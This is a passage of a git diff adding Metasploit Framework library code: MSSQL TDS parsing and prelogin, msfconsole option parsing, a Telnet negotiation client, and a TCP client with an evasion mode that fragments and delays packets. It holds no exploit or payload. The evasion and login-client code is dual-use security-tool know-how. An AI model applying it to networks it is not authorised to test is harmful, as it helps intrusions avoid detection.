+            info[:colnames] << (col[:name] || 'NULL')
+          end
+        end
+
+        #
+        # Parse a single row of a TDS reply
+        #
+        def mssql_parse_tds_row(data, info)
+          info[:rows] ||= []
+          row = []
+
+          info[:colinfos].each do |col|
+
+            if(data.length == 0)
+              row << "<EMPTY>"
+              next
+            end
+
+            case col[:id]
+              when :hex
+                str = ""
+                len = data.slice!(0,2).unpack('v')[0]
+                if(len > 0 and len < 65535)
+                  str << data.slice!(0,len)
+                end
+                row << str.unpack("H*")[0]
+
+              when :string
+                str = ""
+                len = data.slice!(0,2).unpack('v')[0]
+                if(len > 0 and len < 65535)
+                  str << data.slice!(0,len)
+                end
+                row << str.gsub("\x00", '')
+
+              when :datetime
+                row << data.slice!(0,8).unpack("H*")[0]
+
+              when :rawint
+                row << data.slice!(0,4).unpack('V')[0]
+
+              when :bigint
+                row << data.slice!(0,8).unpack("H*")[0]
+
+              when :smallint
+                row << data.slice!(0, 2).unpack("v")[0]
+
+              when :smallint3
+                row << [data.slice!(0, 3)].pack("Z4").unpack("V")[0]
+
+              when :tinyint
+                row << data.slice!(0, 1).unpack("C")[0]
+
+              when :image
+                str = ''
+                len = data.slice!(0,1).unpack('C')[0]
+                str = data.slice!(0,len) if (len and len > 0)
+                row << str.unpack("H*")[0]
+
+              when :int
+                len = data.slice!(0, 1).unpack("C")[0]
+                raw = data.slice!(0, len) if (len and len > 0)
+
+                case len
+                  when 0,255
+                    row << ''
+                  when 1
+                    row << raw.unpack("C")[0]
+                  when 2
+                    row << raw.unpack('v')[0]
+                  when 4
+                    row << raw.unpack('V')[0]
+                  when 5
+                    row << raw.unpack('V')[0] # XXX: missing high byte
+                  when 8
+                    row << raw.unpack('VV')[0] # XXX: missing high dword
+                  else
+                    info[:errors] << "invalid integer size: #{len} #{data[0,16].unpack("H*")[0]}"
+                end
+              else
+                info[:errors] << "unknown column type: #{col.inspect}"
+            end
+          end
+
+          info[:rows] << row
+          info
+        end
+
+        #
+        #this method send a prelogin packet and check if encryption is off
+        #
+        def mssql_prelogin(enc_error=false)
+
+          pkt = ""
+          pkt_hdr = ""
+          pkt_data_token = ""
+          pkt_data = ""
+
+
+          pkt_hdr =	[
+              TYPE_PRE_LOGIN_MESSAGE, #type
+              STATUS_END_OF_MESSAGE, #status
+              0x0000, #length
+              0x0000, # SPID
+              0x00, # PacketID
+              0x00 #Window
+          ]
+
+          version = [0x55010008,0x0000].pack("Vv")
+          encryption = ENCRYPT_NOT_SUP # off
+          instoptdata = "MSSQLServer\0"
+
+          threadid =   "\0\0" + Rex::Text.rand_text(2)
+
+          idx = 21 # size of pkt_data_token
+          pkt_data_token <<	[
+              0x00, 		# Token 0 type Version
+              idx , 	# VersionOffset
+              version.length, # VersionLength
+
+              0x01, 			    	# Token 1 type Encryption
+              idx = idx + version.length, 	# EncryptionOffset
+              0x01, 			    	# EncryptionLength
+
+              0x02, 				# Token 2 type InstOpt
+              idx = idx + 1,  		# InstOptOffset
+              instoptdata.length, 		# InstOptLength
+
+              0x03, 				# Token 3 type Threadid
+              idx + instoptdata.length, 	# ThreadIdOffset
+              0x04,				# ThreadIdLength
+
+              0xFF
+          ].pack("CnnCnnCnnCnnC")
+
+          pkt_data  	<<	pkt_data_token
+          pkt_data  	<<	version
+          pkt_data  	<<	encryption
+          pkt_data  	<<	instoptdata
+          pkt_data  	<<	threadid
+
+          pkt_hdr[2]	= 	pkt_data.length + 8
+
+          pkt 		= 	 pkt_hdr.pack("CCnnCC") + pkt_data
+
+          resp = mssql_send_recv(pkt)
+
+          idx = 0
+
+          while resp and resp[0,1] != "\xff" and resp.length > 5
+            token = resp.slice!(0,5)
+            token = token.unpack("Cnn")
+            idx -= 5
+            if token[0] == 0x01
+
+              idx += token[1]
+              break
+            end
+          end
+          if idx > 0
+            encryption_mode = resp[idx,1].unpack("C")[0]
+          else
+            #force to ENCRYPT_NOT_SUP and hope for the best
+            encryption_mode = ENCRYPT_NOT_SUP
+          end
+
+          if encryption_mode != ENCRYPT_NOT_SUP and enc_error
+            raise RuntimeError,"Encryption is not supported"
+          end
+          encryption_mode
+        end
+
+        #
+        # Send and receive using TDS
+        #
+        def mssql_send_recv(req, timeout=15, check_status = true)
+          sock.put(req)
+
+          # Read the 8 byte header to get the length and status
+          # Read the length to get the data
+          # If the status is 0, read another header and more data
+
+          done = false
+          resp = ""
+
+          while(not done)
+            head = sock.get_once(8, timeout)
+            if !(head and head.length == 8)
+              return false
+            end
+
+            # Is this the last buffer?
+            if(head[1,1] == "\x01" or not check_status )
+              done = true
+            end
+
+            # Grab this block's length
+            rlen = head[2,2].unpack('n')[0] - 8
+
+            while(rlen > 0)
+              buff = sock.get_once(rlen, timeout)
+              return if not buff
+              resp << buff
+              rlen -= buff.length
+            end
+          end
+
+          resp
+        end
+
+        #
+        # Encrypt a password according to the TDS protocol (encode)
+        #
+        def mssql_tds_encrypt(pass)
+          # Convert to unicode, swap 4 bits both ways, xor with 0xa5
+          Rex::Text.to_unicode(pass).unpack('C*').map {|c| (((c & 0x0f) << 4) + ((c & 0xf0) >> 4)) ^ 0xa5 }.pack("C*")
+        end
+
+        protected
+
+        def windows_authentication
+          raise NotImplementedError
+        end
+
+        def use_ntlm2_session
+          raise NotImplementedError
+        end
+
+        def use_ntlmv2
+          raise NotImplementedError
+        end
+
+        def send_lm
+          raise NotImplementedError
+        end
+
+        def send_ntlm
+          raise NotImplementedError
+        end
+
+        def send_spn
+          raise NotImplementedError
+        end
+
+      end
+
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/parsed_options.rb b/lib/metasploit/framework/parsed_options.rb
new file mode 100644
index 0000000000..4a5727fc0f
--- /dev/null
+++ b/lib/metasploit/framework/parsed_options.rb
@@ -0,0 +1,27 @@
+#
+# Gems
+#
+
+require 'active_support/dependencies/autoload'
+
+# @note Must use the nested declaration of the
+#   {Metasploit::Framework::ParsedOptions} namespace because commands, which
+#   use parsed options, need to be able to be required directly without any
+#   other part of metasploit-framework besides config/boot so that the
+#   commands can parse arguments, setup RAILS_ENV, and load
+#   config/application.rb correctly.
+module Metasploit
+  module Framework
+    # Namespace for parsed options for {Metasploit::Framework::Command
+    # commands}.  The names of `Class`es in this namespace correspond to the
+    # name of the `Class` in the {Metasploit::Framework::Command} namespace
+    # for which this namespace's `Class` parses options.
+    module ParsedOptions
+      extend ActiveSupport::Autoload
+
+      autoload :Base
+      autoload :Console
+    end
+  end
+end
+
diff --git a/lib/metasploit/framework/parsed_options/base.rb b/lib/metasploit/framework/parsed_options/base.rb
new file mode 100644
index 0000000000..3230ee214e
--- /dev/null
+++ b/lib/metasploit/framework/parsed_options/base.rb
@@ -0,0 +1,185 @@
+#
+# Standard Library
+#
+
+require 'optparse'
+
+#
+# Gems
+#
+
+require 'active_support/ordered_options'
+
+#
+# Project
+#
+
+require 'metasploit/framework/parsed_options'
+require 'msf/base/config'
+
+# Options parsed from the command line that can be used to change the
+# `Metasploit::Framework::Application.config` and `Rails.env`
+class Metasploit::Framework::ParsedOptions::Base
+  #
+  # CONSTANTS
+  #
+
+  # msfconsole boots in production mode instead of the normal rails default of
+  # development.
+  DEFAULT_ENVIRONMENT = 'production'
+
+  #
+  # Attributes
+  #
+
+  attr_reader :positional
+
+  #
+  # Instance Methods
+  #
+
+  def initialize(arguments=ARGV)
+    @positional = option_parser.parse(arguments)
+  end
+
+  # Translates {#options} to the `application`'s config
+  #
+  # @param application [Rails::Application]
+  # @return [void]
+  def configure(application)
+    application.config['config/database'] = options.database.config
+  end
+
+  # Sets the `RAILS_ENV` environment variable.
+  #
+  # 1. If the -E/--environment option is given, then its value is used.
+  # 2. The default value, 'production', is used.
+  #
+  # @return [void]
+  def environment!
+    if defined?(Rails) && Rails.instance_variable_defined?(:@_env) && Rails.env != options.environment
+      raise "#{self.class}##{__method__} called too late to set RAILS_ENV: Rails.env already memoized"
+    end
+
+    ENV['RAILS_ENV'] = options.environment
+  end
+
+  # Options parsed from
+  #
+  # @return [ActiveSupport::OrderedOptions]
+  def options
+    unless @options
+      options = ActiveSupport::OrderedOptions.new
+
+      options.database = ActiveSupport::OrderedOptions.new
+
+      user_config_root = Pathname.new(Msf::Config.get_config_root)
+      user_database_yaml = user_config_root.join('database.yml')
+
+      if user_database_yaml.exist?
+        options.database.config = user_database_yaml.to_path
+      else
+        options.database.config = 'config/database.yml'
+      end
+
+      options.database.disable = false
+      options.database.migrations_paths = []
+
+      # If RAILS_ENV is set, then it will be used, but if RAILS_ENV is set and the --environment option is given, then
+      # --environment value will be used to reset ENV[RAILS_ENV].
+      options.environment = ENV['RAILS_ENV'] || DEFAULT_ENVIRONMENT
+
+      options.framework = ActiveSupport::OrderedOptions.new
+      options.framework.config = nil
+
+      options.modules = ActiveSupport::OrderedOptions.new
+      options.modules.path = nil
+
+      @options = options
+    end
+
+    @options
+  end
+
+  private
+
+  # Parses arguments into {#options}.
+  #
+  # @return [OptionParser]
+  def option_parser
+    @option_parser ||= OptionParser.new { |option_parser|
+      option_parser.separator ''
+      option_parser.separator 'Common options'
+
+      option_parser.on(
+          '-E',
+          '--environment ENVIRONMENT',
+          %w{development production test},
+          "The Rails environment. Will use RAIL_ENV environment variable if that is set.  " \
+          "Defaults to production if neither option not RAILS_ENV environment variable is set."
+      ) do |environment|
+        options.environment = environment
+      end
+
+      option_parser.separator ''
+      option_parser.separator 'Database options'
+
+      option_parser.on(
+          '-M',
+          '--migration-path DIRECTORY',
+          'Specify a directory containing additional DB migrations'
+      ) do |directory|
+        options.database.migrations_paths << directory
+      end
+
+      option_parser.on('-n', '--no-database', 'Disable database support') do
+        options.database.disable = true
+      end
+
+      option_parser.on(
+          '-y',
+          '--yaml PATH',
+          'Specify a YAML file containing database settings'
+      ) do |path|
+        options.database.config = path
+      end
+
+      option_parser.separator ''
+      option_parser.separator 'Framework options'
+
+
+      option_parser.on('-c', '-c FILE', 'Load the specified configuration file') do |file|
+        options.framework.config = file
+      end
+
+      option_parser.on(
+          '-v',
+          '--version',
+          'Show version'
+      ) do
+        options.subcommand = :version
+      end
+
+      option_parser.separator ''
+      option_parser.separator 'Module options'
+
+      option_parser.on(
+          '-m',
+          '--module-path DIRECTORY',
+          'An additional module path'
+      ) do |directory|
+        options.modules.path = directory
+      end
+
+      #
+      # Tail
+      #
+
+      option_parser.separator ''
+      option_parser.on_tail('-h', '--help', 'Show this message') do
+        puts option_parser
+        exit
+      end
+    }
+  end
+end
diff --git a/lib/metasploit/framework/parsed_options/console.rb b/lib/metasploit/framework/parsed_options/console.rb
new file mode 100644
index 0000000000..ff9f75a73f
--- /dev/null
+++ b/lib/metasploit/framework/parsed_options/console.rb
@@ -0,0 +1,79 @@
+# Parsed options for {Metasploit::Framework::Command::Console}
+class Metasploit::Framework::ParsedOptions::Console < Metasploit::Framework::ParsedOptions::Base
+  # Options parsed from msfconsole command-line.
+  #
+  # @return [ActiveSupport::OrderedOptions]
+  def options
+    unless @options
+      super.tap { |options|
+        options.console = ActiveSupport::OrderedOptions.new
+
+        options.console.commands = []
+        options.console.confirm_exit = false
+        options.console.defanged = false
+        options.console.local_output = nil
+        options.console.plugins = []
+        options.console.quiet = false
+        options.console.real_readline = false
+        options.console.resources = []
+        options.console.subcommand = :run
+      }
+    end
+
+    @options
+  end
+
+  private
+
+  # Parses msfconsole arguments into {#options}.
+  #
+  # @return [OptionParser]
+  def option_parser
+    unless @option_parser
+      super.tap { |option_parser|
+        option_parser.banner = "Usage: #{option_parser.program_name} [options]"
+
+        option_parser.separator ''
+        option_parser.separator 'Console options:'
+
+        option_parser.on('-a', '--ask', "Ask before exiting Metasploit or accept 'exit -y'") do
+          options.console.confirm_exit = true
+        end
+
+        option_parser.on('-d', '--defanged', 'Execute the console as defanged') do
+          options.console.defanged = true
+        end
+
+        option_parser.on('-L', '--real-readline', 'Use the system Readline library instead of RbReadline') do
+          options.console.real_readline = true
+        end
+
+        option_parser.on('-o', '--output FILE', 'Output to the specified file') do |file|
+          options.console.local_output = file
+        end
+
+        option_parser.on('-p', '--plugin PLUGIN', 'Load a plugin on startup') do |plugin|
+          options.console.plugins << plugin
+        end
+
+        option_parser.on('-q', '--quiet', 'Do not print the banner on start up') do
+          options.console.quiet = true
+        end
+
+        option_parser.on('-r', '--resource FILE', 'Execute the specified resource file') do |file|
+          options.console.resources << file
+        end
+
+        option_parser.on(
+            '-x',
+            '--execute-command COMMAND',
+            'Execute the specified string as console commands (use ; for multiples)'
+        ) do |commands|
+          options.console.commands += commands.split(/\s*;\s*/)
+        end
+      }
+    end
+
+    @option_parser
+  end
+end
diff --git a/lib/metasploit/framework/require.rb b/lib/metasploit/framework/require.rb
new file mode 100644
index 0000000000..c493c834e6
--- /dev/null
+++ b/lib/metasploit/framework/require.rb
@@ -0,0 +1,92 @@
+# @note needs to use explicit nesting. so this file can be loaded directly without loading 'metasploit/framework', this
+#   file can be used prior to Bundler.require.
+module Metasploit
+  module Framework
+    # Extension to `Kernel#require` behavior.
+    module Require
+      #
+      # Module Methods
+      #
+
+      # Tries to require `name`.  If a `LoadError` occurs, then `without_warning` is printed to standard error using
+      # `Kernel#warn`, along with instructions for reinstalling the bundle.  If a `LoadError` does not occur, then
+      # `with_block` is called.
+      #
+      # @param name [String] the name of the library to `Kernel#require`.
+      # @param without_warning [String] warning to print if `name` cannot be required.
+      # @yield block to run when `name` requires successfully
+      # @yieldreturn [void]
+      # @return [void]
+      def self.optionally(name, without_warning)
+        begin
+          require name
+        rescue LoadError
+          warn without_warning
+          warn "Bundle installed '--without #{Bundler.settings.without.join(' ')}'"
+          warn "To clear the without option do `bundle install --without ''` " \
+           "(the --without flag with an empty string) or " \
+           "`rm -rf .bundle` to remove the .bundle/config manually and " \
+           "then `bundle install`"
+        else
+          if block_given?
+            yield
+          end
+        end
+      end
+
+      # Tries to `require 'active_record/railtie'` to define the activerecord Rails initializers and rake tasks.
+      #
+      # @example Optionally requiring 'active_record/railtie'
+      #   require 'metasploit/framework/require'
+      #
+      #   class MyClass
+      #     def setup
+      #       if database_enabled
+      #         Metasploit::Framework::Require.optionally_active_record_railtie
+      #       end
+      #     end
+      #   end
+      #
+      # @return [void]
+      def self.optionally_active_record_railtie
+        optionally(
+            'active_record/railtie',
+            'activerecord not in the bundle, so database support will be disabled.'
+        )
+      end
+
+      # Tries to `require 'metasploit/credential/creation'` and include it in the `including_module`.
+      #
+      # @param including_module [Module] `Class` or `Module` that wants to `include Metasploit::Credential::Creation`.
+      # @return [void]
+      def self.optionally_include_metasploit_credential_creation(including_module)
+        optionally(
+            'metasploit/credential/creation',
+            "metasploit-credential not in the bundle, so Metasploit::Credential creation will fail for #{including_module.name}",
+        ) do
+          including_module.send(:include, Metasploit::Credential::Creation)
+        end
+      end
+
+      #
+      # Instance Methods
+      #
+
+      # Tries to `require 'metasploit/credential/creation'` and include it in this `Class` or `Module`.
+      #
+      # @example Using in a `Module`
+      #   require 'metasploit/framework/require'
+      #
+      #   module MyModule
+      #     extend Metasploit::Framework::Require
+      #
+      #     optionally_include_metasploit_credential_creation
+      #   end
+      #
+      # @return [void]
+      def optionally_include_metasploit_credential_creation
+        Metasploit::Framework::Require.optionally_include_metasploit_credential_creation(self)
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/tcp/client.rb b/lib/metasploit/framework/tcp/client.rb
new file mode 100644
index 0000000000..9320936192
--- /dev/null
+++ b/lib/metasploit/framework/tcp/client.rb
@@ -0,0 +1,186 @@
+module Metasploit
+  module Framework
+    module Tcp
+
+      module EvasiveTCP
+        attr_accessor :_send_size, :_send_delay, :evasive
+
+        def denagle
+          begin
+            setsockopt(Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1)
+          rescue ::Exception
+          end
+        end
+
+        def write(buf, opts={})
+
+          return super(buf, opts) if not @evasive
+
+          ret = 0
+          idx = 0
+          len = @_send_size || buf.length
+
+          while(idx < buf.length)
+
+            if(@_send_delay and idx > 0)
+              ::IO.select(nil, nil, nil, @_send_delay)
+            end
+
+            pkt = buf[idx, len]
+
+            res = super(pkt, opts)
+            flush()
+
+            idx += len
+            ret += res if res
+          end
+          ret
+        end
+      end
+
+      module Client
+
+        #
+        # Establishes a TCP connection to the specified RHOST/RPORT
+        #
+        # @see Rex::Socket::Tcp
+        # @see Rex::Socket::Tcp.create
+        def connect(global = true, opts={})
+
+          dossl = false
+          if(opts.has_key?('SSL'))
+            dossl = opts['SSL']
+          else
+            dossl = ssl
+          end
+
+          nsock = Rex::Socket::Tcp.create(
+              'PeerHost'   =>  opts['RHOST'] || rhost,
+              'PeerPort'   => (opts['RPORT'] || rport).to_i,
+              'LocalHost'  =>  opts['CHOST'] || chost || "0.0.0.0",
+              'LocalPort'  => (opts['CPORT'] || cport || 0).to_i,
+              'SSL'        =>  dossl,
+              'SSLVersion' =>  opts['SSLVersion'] || ssl_version,
+              'Proxies'    => proxies,
+              'Timeout'    => (opts['ConnectTimeout'] || connection_timeout || 10).to_i
+              )
+
+          # enable evasions on this socket
+          set_tcp_evasions(nsock)
+
+          # Set this socket to the global socket as necessary
+          self.sock = nsock if (global)
+
+          return nsock
+        end
+
+        # Enable evasions on a given client
+        def set_tcp_evasions(socket)
+
+          if( max_send_size.to_i == 0 and send_delay.to_i == 0)
+            return
+          end
+
+          return if socket.respond_to?('evasive')
+
+          socket.extend(EvasiveTCP)
+
+          if ( max_send_size.to_i > 0)
+            socket._send_size = max_send_size
+            socket.denagle
+            socket.evasive = true
+          end
+
+          if ( send_delay.to_i > 0)
+            socket._send_delay = send_delay
+            socket.evasive = true
+          end
+        end
+
+        #
+        # Closes the TCP connection
+        #
+        def disconnect(nsock = self.sock)
+          begin
+            if (nsock)
+              nsock.shutdown
+              nsock.close
+            end
+          rescue IOError
+          end
+
+          if (nsock == sock)
+            self.sock = nil
+          end
+
+        end
+
+        ##
+        #
+        # Wrappers for getters
+        #
+        ##
+
+        def max_send_size
+          raise NotImplementedError
+        end
+
+        def send_delay
+          raise NotImplementedError
+        end
+
+        #
+        # Returns the target host
+        #
+        def rhost
+          raise NotImplementedError
+        end
+
+        #
+        # Returns the remote port
+        #
+        def rport
+          raise NotImplementedError
+        end
+
+        #
+        # Returns the local host for outgoing connections
+        #
+        def chost
+          raise NotImplementedError
+        end
+
+        #
+        # Returns the local port for outgoing connections
+        #
+        def cport
+          raise NotImplementedError
+        end
+
+        #
+        # Returns the boolean indicating SSL
+        #
+        def ssl
+          raise NotImplementedError
+        end
+
+        #
+        # Returns the string indicating SSLVersion
+        #
+        def ssl_version
+          raise NotImplementedError
+        end
+
+        #
+        # Returns the proxy configuration
+        #
+        def proxies
+          raise NotImplementedError
+        end
+
+        attr_accessor :sock
+
+      end
+    end
+  end
+end
diff --git a/lib/metasploit/framework/telnet/client.rb b/lib/metasploit/framework/telnet/client.rb
new file mode 100644
index 0000000000..7b88dcf2bf
--- /dev/null
+++ b/lib/metasploit/framework/telnet/client.rb
@@ -0,0 +1,219 @@
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module Telnet
+      module Client
+        include Metasploit::Framework::Tcp::Client
+        include Msf::Auxiliary::Login
+
+        attr_accessor :banner
+
+        #
+        # CONSTANTS
+        #
+        # Borrowing constants from Ruby's Net::Telnet class (ruby license)
+        IAC   = 255.chr # "\377" # "\xff" # interpret as command
+        DONT  = 254.chr # "\376" # "\xfe" # you are not to use option
+        DO    = 253.chr # "\375" # "\xfd" # please, you use option
+        WONT  = 252.chr # "\374" # "\xfc" # I won't use option
+        WILL  = 251.chr # "\373" # "\xfb" # I will use option
+        SB    = 250.chr # "\372" # "\xfa" # interpret as subnegotiation
+        GA    = 249.chr # "\371" # "\xf9" # you may reverse the line
+        EL    = 248.chr # "\370" # "\xf8" # erase the current line
+        EC    = 247.chr # "\367" # "\xf7" # erase the current character
+        AYT   = 246.chr # "\366" # "\xf6" # are you there
+        AO    = 245.chr # "\365" # "\xf5" # abort output--but let prog finish
+        IP    = 244.chr # "\364" # "\xf4" # interrupt process--permanently
+        BREAK = 243.chr # "\363" # "\xf3" # break
+        DM    = 242.chr # "\362" # "\xf2" # data mark--for connect. cleaning
+        NOP   = 241.chr # "\361" # "\xf1" # nop
+        SE    = 240.chr # "\360" # "\xf0" # end sub negotiation
+        EOR   = 239.chr # "\357" # "\xef" # end of record (transparent mode)
+        ABORT = 238.chr # "\356" # "\xee" # Abort process
+        SUSP  = 237.chr # "\355" # "\xed" # Suspend process
+        EOF   = 236.chr # "\354" # "\xec" # End of file
+        SYNCH = 242.chr # "\362" # "\xf2" # for telfunc calls
+
+        OPT_BINARY         =   0.chr # "\000" # "\x00" # Binary Transmission
+        OPT_ECHO           =   1.chr # "\001" # "\x01" # Echo
+        OPT_RCP            =   2.chr # "\002" # "\x02" # Reconnection
+        OPT_SGA            =   3.chr # "\003" # "\x03" # Suppress Go Ahead
+        OPT_NAMS           =   4.chr # "\004" # "\x04" # Approx Message Size Negotiation
+        OPT_STATUS         =   5.chr # "\005" # "\x05" # Status
+        OPT_TM             =   6.chr # "\006" # "\x06" # Timing Mark
+        OPT_RCTE           =   7.chr # "\a"   # "\x07" # Remote Controlled Trans and Echo
+        OPT_NAOL           =   8.chr # "\010" # "\x08" # Output Line Width
+        OPT_NAOP           =   9.chr # "\t"   # "\x09" # Output Page Size
+        OPT_NAOCRD         =  10.chr # "\n"   # "\x0a" # Output Carriage-Return Disposition
+        OPT_NAOHTS         =  11.chr # "\v"   # "\x0b" # Output Horizontal Tab Stops
+        OPT_NAOHTD         =  12.chr # "\f"   # "\x0c" # Output Horizontal Tab Disposition
+        OPT_NAOFFD         =  13.chr # "\r"   # "\x0d" # Output Formfeed Disposition
+        OPT_NAOVTS         =  14.chr # "\016" # "\x0e" # Output Vertical Tabstops
+        OPT_NAOVTD         =  15.chr # "\017" # "\x0f" # Output Vertical Tab Disposition
+        OPT_NAOLFD         =  16.chr # "\020" # "\x10" # Output Linefeed Disposition
+        OPT_XASCII         =  17.chr # "\021" # "\x11" # Extended ASCII
+        OPT_LOGOUT         =  18.chr # "\022" # "\x12" # Logout
+        OPT_BM             =  19.chr # "\023" # "\x13" # Byte Macro
+        OPT_DET            =  20.chr # "\024" # "\x14" # Data Entry Terminal
+        OPT_SUPDUP         =  21.chr # "\025" # "\x15" # SUPDUP
+        OPT_SUPDUPOUTPUT   =  22.chr # "\026" # "\x16" # SUPDUP Output
+        OPT_SNDLOC         =  23.chr # "\027" # "\x17" # Send Location
+        OPT_TTYPE          =  24.chr # "\030" # "\x18" # Terminal Type
+        OPT_EOR            =  25.chr # "\031" # "\x19" # End of Record
+        OPT_TUID           =  26.chr # "\032" # "\x1a" # TACACS User Identification
+        OPT_OUTMRK         =  27.chr # "\e"   # "\x1b" # Output Marking
+        OPT_TTYLOC         =  28.chr # "\034" # "\x1c" # Terminal Location Number
+        OPT_3270REGIME     =  29.chr # "\035" # "\x1d" # Telnet 3270 Regime
+        OPT_X3PAD          =  30.chr # "\036" # "\x1e" # X.3 PAD
+        OPT_NAWS           =  31.chr # "\037" # "\x1f" # Negotiate About Window Size
+        OPT_TSPEED         =  32.chr # " "    # "\x20" # Terminal Speed
+        OPT_LFLOW          =  33.chr # "!"    # "\x21" # Remote Flow Control
+        OPT_LINEMODE       =  34.chr # "\""   # "\x22" # Linemode
+        OPT_XDISPLOC       =  35.chr # "#"    # "\x23" # X Display Location
+        OPT_OLD_ENVIRON    =  36.chr # "$"    # "\x24" # Environment Option
+        OPT_AUTHENTICATION =  37.chr # "%"    # "\x25" # Authentication Option
+        OPT_ENCRYPT        =  38.chr # "&"    # "\x26" # Encryption Option
+        OPT_NEW_ENVIRON    =  39.chr # "'"    # "\x27" # New Environment Option
+        OPT_EXOPL          = 255.chr # "\377" # "\xff" # Extended-Options-List
+
+        #
+        # This method establishes an Telnet connection to host and port specified by
+        # the RHOST and RPORT options, respectively.  After connecting, the banner
+        # message is read in and stored in the 'banner' attribute. This method has the
+        # benefit of handling telnet option negotiation.
+        #
+        def connect(global = true, verbose = true)
+          @trace = ''
+          @recvd = ''
+          fd = super(global)
+
+          self.banner = ''
+          # Wait for a banner to arrive...
+          begin
+            Timeout.timeout(banner_timeout) do
+              while(true)
+                buff = recv(fd)
+                self.banner << buff if buff
+                if(self.banner =~ @login_regex or self.banner =~ @password_regex)
+                  break
+                elsif self.banner =~ @busy_regex
+                  # It's about to drop connection anyway -- seen on HP JetDirect telnet server
+                  break
+                end
+              end
+            end
+          rescue ::Timeout::Error
+          end
+
+          self.banner.strip!
+
+          # Return the file descriptor to the caller
+          fd
+        end
+
+        # Sometimes telnet servers start RSTing if you get them angry.
+        # This is a short term fix; the problem is that we don't know
+        # if it's going to reset forever, or just this time, or randomly.
+        # A better solution is to get the socket connect to try again
+        # with a little backoff.
+        def connect_reset_safe
+          begin
+            connect
+          rescue Rex::ConnectionRefused
+            return :refused
+          end
+          return :connected
+        end
+
+        def recv(fd=self.sock, timeout=telnet_timeout)
+          recv_telnet(fd, timeout.to_f)
+        end
+
+        #
+        # Handle telnet option negotiation
+        #
+        # Appends to the @recvd buffer which is used to tell us whether we're at a
+        # login prompt, a password prompt, or a working shell.
+        #
+        def recv_telnet(fd, timeout)
+
+          data = ''
+
+          begin
+            data = fd.get_once(-1, timeout)
+            return nil if not data or data.length == 0
+
+            # combine CR+NULL into CR
+            data.gsub!(/#{CR}#{NULL}/no, CR)
+
+            # combine EOL into "\n"
+            data.gsub!(/#{EOL}/no, "\n")
+
+            data.gsub!(/#{IAC}(
+          [#{IAC}#{AO}#{AYT}#{DM}#{IP}#{NOP}]|[#{DO}#{DONT}#{WILL}#{WONT}]
+          [#{OPT_BINARY}-#{OPT_NEW_ENVIRON}#{OPT_EXOPL}]|#{SB}[^#{IAC}]*#{IAC}#{SE}
+          )/xno) do
+              m = $1
+
+              if m == IAC
+                IAC
+              elsif m == AYT
+                fd.write("YES" + EOL)
+                ''
+              elsif m[0,1] == DO
+                if(m[1,1] == OPT_BINARY)
+                  fd.write(IAC + WILL + OPT_BINARY)
+                else
+                  fd.write(IAC + WONT + m[1,1])
+                end
+                ''
+              elsif m[0,1] == DONT
+                fd.write(IAC + WONT + m[1,1])
+                ''
+              elsif m[0,1] == WILL
+                if m[1,1] == OPT_BINARY
+                  fd.write(IAC + DO + OPT_BINARY)
+                  # Disable Echo
+                elsif m[1,1] == OPT_ECHO
+                  fd.write(IAC + DONT + OPT_ECHO)
+                elsif m[1,1] == OPT_SGA
+                  fd.write(IAC + DO + OPT_SGA)
+                else
+                  fd.write(IAC + DONT + m[1,1])
+                end
+                ''
+              elsif m[0,1] == WONT
+                fd.write(IAC + DONT + m[1,1])
+                ''
+              else
+                ''
+              end
+            end
+
+            @trace << data
+            @recvd << data
+            fd.flush
+
+          rescue ::EOFError, ::Errno::EPIPE
+          end
+
+          data
+        end
+
+        #
+        # Wrappers for getters
+        #
+
+        def banner_timeout
+          raise NotImplementedError
+        end
+
+        def telnet_timeout
+          raise NotImplementedError
+        end
+
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
new file mode 100644
index 0000000000..bd19c79202
--- /dev/null
+++ b/lib/metasploit/framework/version.rb
@@ -0,0 +1,13 @@
+module Metasploit
+  module Framework
+    module Version
+      MAJOR = 4
+      MINOR = 10
+      PATCH = 1
+      PRERELEASE = 'dev'
+    end
+
+    VERSION = "#{Version::MAJOR}.#{Version::MINOR}.#{Version::PATCH}-#{Version::PRERELEASE}"
+    GEM_VERSION = VERSION.gsub('-', '.pre.')
+  end
+end
diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb
index b5a8b2f40f..beaac2a5b8 100644
--- a/lib/msf/base/config.rb
+++ b/lib/msf/base/config.rb
@@ -1,6 +1,18 @@
 # -*- coding: binary -*-
+
+#
+# Standard Library
+#
+
 require 'fileutils'
 
+#
+# Project
+#
+
+require 'metasploit/framework/version'
+require 'rex/compat'
+
 module Msf
 
 # This class wraps interaction with global configuration that can be used as a
@@ -25,16 +37,16 @@ class Config < Hash
     ['HOME', 'LOCALAPPDATA', 'APPDATA', 'USERPROFILE'].each do |dir|
       val = Rex::Compat.getenv(dir)
       if (val and File.directory?(val))
-        return File.join(val, ".msf#{Msf::Framework::Major}")
+        return File.join(val, ".msf#{Metasploit::Framework::Version::MAJOR}")
       end
     end
 
     begin
       # First we try $HOME/.msfx
-      File.expand_path("~#{FileSep}.msf#{Msf::Framework::Major}")
+      File.expand_path("~#{FileSep}.msf#{Metasploit::Framework::Version::MAJOR}")
     rescue ::ArgumentError
       # Give up and install root + ".msfx"
-      InstallRoot + ".msf#{Msf::Framework::Major}"
+      InstallRoot + ".msf#{Metasploit::Framework::Version::MAJOR}"
     end
   end
 
diff --git a/lib/msf/base/simple/framework/module_paths.rb b/lib/msf/base/simple/framework/module_paths.rb
index 481068cf3c..e0977be756 100644
--- a/lib/msf/base/simple/framework/module_paths.rb
+++ b/lib/msf/base/simple/framework/module_paths.rb
@@ -9,9 +9,10 @@ module Msf
           # Ensure the module cache is accurate
           self.modules.refresh_cache_from_database
 
-          # Initialize the default module search paths
-          if (Msf::Config.module_directory)
-            self.modules.add_module_path(Msf::Config.module_directory, opts)
+          add_engine_module_paths(Rails.application, opts)
+
+          Rails.application.railties.engines.each do |engine|
+            add_engine_module_paths(engine, opts)
           end
 
           # Initialize the user module search path
@@ -27,6 +28,25 @@ module Msf
             }
           end
         end
+
+        private
+
+        # Add directories `engine.paths['modules']` from `engine`.
+        #
+        # @param engine [Rails::Engine] a rails engine or application
+        # @param options [Hash] options for {Msf::ModuleManager::ModulePaths#add_module_paths}
+        # @return [void]
+        def add_engine_module_paths(engine, options={})
